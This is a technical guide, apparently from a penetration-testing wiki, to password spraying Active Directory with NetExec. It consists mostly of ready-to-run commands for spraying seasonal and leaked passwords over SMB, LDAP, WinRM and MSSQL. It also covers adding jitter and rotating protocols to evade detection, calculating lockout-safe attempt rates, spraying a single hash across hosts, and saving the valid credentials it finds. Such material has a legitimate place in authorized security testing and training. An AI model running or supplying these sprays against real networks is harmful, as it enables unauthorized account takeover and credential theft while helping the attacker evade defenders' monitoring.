Password Spraying with NetExec
#Overview
Password spraying is the technique of testing a single password (or small set of passwords) against many user accounts to avoid account lockouts. It is the inverse of brute-forcing (many passwords against one account). NetExec is the premier tool for password spraying due to its multi-protocol support, lockout awareness, and flexible credential sourcing.
#Prerequisites
- List of valid domain usernames (from LDAP dump, RID brute, or enumeration)
- One or more candidate passwords (seasonal patterns, company name variations, leaked credentials)
- Knowledge of the domain password policy (lockout threshold, lockout duration)
- NetExec installed
#The Core Spraying Command
# Single password across many users
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
# -u users.txt -> one username per line
# -p 'Summer2024!' -> single password to test against all users
# --continue-on-success -> don't stop after first valid credential
# Single user across many passwords (less common, more like brute-force)
netexec smb 10.10.10.5 -u administrator -p passwords.txt --no-bruteforce
# --no-bruteforce -> 1:1 mapping (line 1 of users.txt with line 1 of passwords.txt)
# User:password combo file (exact pairs)
netexec smb 10.10.10.0/24 -u users.txt -p passwords.txt --no-bruteforce
# Each line from users.txt paired with corresponding line from passwords.txt
BASH
#Spraying Strategies
#Strategy 1: Seasonal/Contextual Passwords
Most organizations have users with predictable password patterns:
# Seasonal patterns
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'Winter2024!' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'Spring2025!' --continue-on-success
# Company name variations
netexec smb 10.10.10.0/24 -u users.txt -p 'Acme2024!' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'Acme@2024' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'Welcome123' --continue-on-success
# Local sports/landmarks
netexec smb 10.10.10.0/24 -u users.txt -p 'Eagles2024!' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'LibertyBell1' --continue-on-success
BASH
#Strategy 2: Password Reuse from Breaches
# Test known leaked passwords against current accounts
netexec smb 10.10.10.0/24 -u users.txt -p leaked_passwords.txt --no-bruteforce
# Use --no-bruteforce when you have specific user:password pairs from breaches
BASH
#Strategy 3: Low-and-Slow with Jitter
# Add jitter to avoid detection and reduce lockout risk
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success -j 5
# -j 5 -> random 0–5 second delay between attempts
# Spreads attempts over time, evades rate-based detection
BASH
#Strategy 4: Protocol Rotation
If SMB spraying is blocked/monitored, rotate protocols:
# Spray via LDAP (fewer login events on DC)
netexec ldap 10.10.10.5 -u users.txt -p 'Summer2024!' --continue-on-success
# Spray via WinRM (different log source)
netexec winrm 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
# Spray via MSSQL (often unmonitored)
netexec mssql 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
BASH
#Lockout Avoidance
#Step 1: Check Password Policy First
netexec smb 10.10.10.5 -u valid_user -p valid_pass --password-policy
# Lockout threshold: 5 → account locks after 5 failed attempts
# Lockout duration: 30 min → lockout lasts 30 minutes
# Lockout observation window: 30 min → failed attempts reset after 30 min
BASH
#Step 2: Calculate Safe Spraying Rate
Safe attempts per user = Lockout threshold - 2
= 5 - 2 = 3 attempts per observation window
If observation window = 30 minutes:
→ Test at most 3 passwords per user every 30 minutes
→ Or: test 1 password every 10 minutes
TEXT
#Step 3: Spray One Password at a Time
# Round 1: One password against all users
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
# Wait for observation window to pass, then Round 2
netexec smb 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
BASH
#Advanced Spraying Techniques
#Targeted Spraying (High-Value Users Only)
# Extract high-value users first
grep -E "admin|sql|svc|backup|service" users.txt > high_value_users.txt
# Spray only high-value targets
netexec smb 10.10.10.0/24 -u high_value_users.txt -p 'P@ssw0rd!' --continue-on-success
BASH
#Subnet-Wide Spraying
# Spray across entire internal range
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
netexec smb 10.10.11.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
netexec smb 10.10.12.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
BASH
#Spraying with Hashes (Pass-the-Hash Spray)
# If you have one hash, test it against many targets
netexec smb 10.10.10.0/24 -u administrator -H ':NTHASH' --continue-on-success --local-auth
# Tests if the same local admin hash works across multiple hosts
BASH
#Output and Logging
# Save results to workspace
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success -o spray_results
# Parse results for valid credentials
cat ~/.netexec/workspaces/default/smb/spray_results/*.log | grep '[+]'
# Generate credential list from successes
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success | grep '[+]' | awk '{print $2, $4}' > valid_creds.txt
BASH
#Common Pitfalls
- ⚠️ Lockout threshold unknown: Always check password policy before spraying. Guessing the threshold leads to account lockouts.
- ⚠️ Observation window overlap: If the observation window is 30 minutes and you spray 3 passwords in 10 minutes, you've hit the threshold. Space attempts across the full window.
- ⚠️ Service accounts: Service accounts often have different lockout policies (or none). Spraying against
krbtgtorsql_svcmay not cause lockouts but is highly suspicious. - ⚠️ Default domain policy: The default AD password policy (if never changed) is: min length 7, lockout threshold 0 (disabled), no complexity. Always verify — most organizations change these defaults.
- ⚠️ Fine-grained password policies: Windows Server 2008+ supports per-group password policies. The domain-wide policy may not apply to privileged groups. Check with
--password-policyon a DC.
#OPSEC Considerations
| Technique | Noise Level | Artifacts |
|---|---|---|
| Single password spray | Medium | 4625 events across multiple accounts, pattern recognizable |
| Low-and-slow with jitter | Low | 4625 events spread over time, harder to correlate |
| LDAP-based spraying | Low | LDAP bind failures, not Windows login events |
| Multi-protocol rotation | Medium | Different log sources, harder to correlate |
| Hash spraying | Low | No password failures, only NTLM auth attempts |
#Post-Exploitation Value
- Valid credentials → the foundation for all further attack steps
- Credential patterns → insight into organizational password culture
- Local admin identification → (Pwn3d!) indicator shows which hosts you fully control
- Cross-protocol validation → SMB valid + WinRM valid = remote PowerShell access
#Cross-References
- SMB Operations — Primary spraying protocol
- LDAP Operations — LDAP-based spraying
- Credential Dumping — What to do after getting valid credentials
- AD Attacks via NetExec — Full attack chains
- Password Spraying (AD) — General password spraying technique
#Tool References
- NetExec Spraying Documentation
- SprayingToolkit — Complementary spraying tools
- Domain Password Audit Tool (DPAT) — Password policy analysis